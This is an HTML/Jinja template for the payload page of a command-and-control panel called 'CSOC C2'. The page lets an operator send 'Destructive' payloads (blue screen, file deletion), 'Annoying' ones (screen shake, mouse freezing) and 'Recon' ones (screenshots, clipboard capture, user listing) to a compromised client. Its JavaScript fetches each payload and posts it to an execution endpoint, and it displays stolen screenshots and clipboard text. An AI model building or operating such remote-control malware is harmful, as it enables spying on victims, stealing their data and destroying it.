{% extends "base.html" %}


{% block title %}

	<title>CSOC C2 - Payloads</title>

{% endblock %}


{% block main %}

<main id="main" class="main">

    <div class="pagetitle">
      <h1>Payloads</h1>
      <nav>
        <ol class="breadcrumb">
          <li class="breadcrumb-item"><a href="/">Home</a></li>
          <li class="breadcrumb-item">Client - {{ client }}</li>
          <li class="breadcrumb-item active">Payloads</li>
        </ol>
      </nav>
    </div><!-- End Page Title -->

    <section class="section">
      <div class="row">
        <div class="col-lg-12">

          <div class="card">
            <div class="card-body">
              <h5 class="card-title"></h5>

              <!-- List group with Links and buttons -->
              <div class="list-group">
                <button type="button" class="list-group-item list-group-item-action disabled active" aria-current="true">
                  Destructive
                </button>
                <button type="button" class="list-group-item list-group-item-action" onclick="getPayloadBytes('bsod')">Blue Screen of Death</button>
                <button type="button" class="list-group-item list-group-item-action"onclick="callAPI('test')">File Deletion</button>
                <button type="button" class="list-group-item list-group-item-action"onclick="callAPI('calc')">Open Windows</button>
              </div><!-- End List group with Links and buttons -->

            </div>
          </div>

          <div class="card">
            <div class="card-body">
              <h5 class="card-title"></h5>

               <!-- List group with Links and buttons -->
               <div class="list-group">
                <button type="button" class="list-group-item list-group-item-action active" aria-current="true">
                  Annoying
                </button>
                <button type="button" class="list-group-item list-group-item-action"onclick="getPayloadBytes('shake')">Shake</button>
                <button type="button" class="list-group-item list-group-item-action"onclick="getPayloadBytes('mouse_stop')">Mouse Stop</button>
                <button type="button" class="list-group-item list-group-item-action"onclick="getPayloadBytes('avoid')">Avoid</button>
                <button type="button" class="list-group-item list-group-item-action"onclick="getPayloadBytes('mouse_cursor')">The Bird</button>
                <button type="button" class="list-group-item list-group-item-action"onclick="getPayloadBytes('rotate')">Rotate</button>
              </div><!-- End List group with Links and buttons -->

            </div>
          </div>

          <div class="card">
            <div class="card-body">
              <h5 class="card-title"></h5>

              <!-- List group with Links and buttons -->
              <div class="list-group">
                <button type="button" class="list-group-item list-group-item-action active" aria-current="true">
                  Recon
                </button>
                <button type="button" class="list-group-item list-group-item-action"onclick="getScreenshot()">Get Screenshot</button>
                <button type="button" class="list-group-item list-group-item-action"onclick="getClipboard()" id="clipboardElem">Get Clipboard</button>
                <button type="button" class="list-group-item list-group-item-action"onclick="callAPI('test')">List Users </button>
              </div><!-- End List group with Links and buttons -->

            </div>
          </div>
        </div>

      </div>
    </section>

  </main>

{% endblock %}


{% block js %}

<script type="text/javascript">

function getPayloadBytes(name) {
  var xhr = new XMLHttpRequest();
  xhr.open("POST", '/api/payload/get', true);
  xhr.setRequestHeader('Content-Type', 'application/json');
  xhr.send(JSON.stringify({
      "name": name
  }));

  xhr.onreadystatechange = function() {
    if (xhr.readyState == XMLHttpRequest.DONE) {
        var payload = xhr.responseText;
        callAPI("exec:" + payload);
    }
  }
}

function callAPI(payload) {
  var xhr = new XMLHttpRequest();
  xhr.open("POST", '/api/payload/exec', true);
  xhr.setRequestHeader('Content-Type', 'application/json');
  xhr.send(JSON.stringify({
      "client": '{{client}}',
      "payload": payload
  }));
}

function getScreenshot() {
  var xhr = new XMLHttpRequest();
  xhr.open("POST", '/api/payload/ss', true);
  xhr.setRequestHeader('Content-Type', 'application/json');
  xhr.send(JSON.stringify({
      "client": '{{client}}'
  }));

  xhr.onreadystatechange = function() {
    if (xhr.readyState == XMLHttpRequest.DONE) {
        var ss = xhr.responseText;js 
        window.open("data:image/png;base64," + ss, '_blank');
    }
  }
}

function getClipboard() {
  var xhr = new XMLHttpRequest();
  xhr.open("POST", '/api/payload/clipboard', true);
  xhr.setRequestHeader('Content-Type', 'application/json');
  xhr.send(JSON.stringify({
      "client": '{{client}}'
  }));

  xhr.onreadystatechange = function() {
    if (xhr.readyState == XMLHttpRequest.DONE) {
        var elem = document.getElementById("clipboardElem");
        elem.innerHTML = xhr.responseText;
    }
  }
}

</script>

{% endblock %}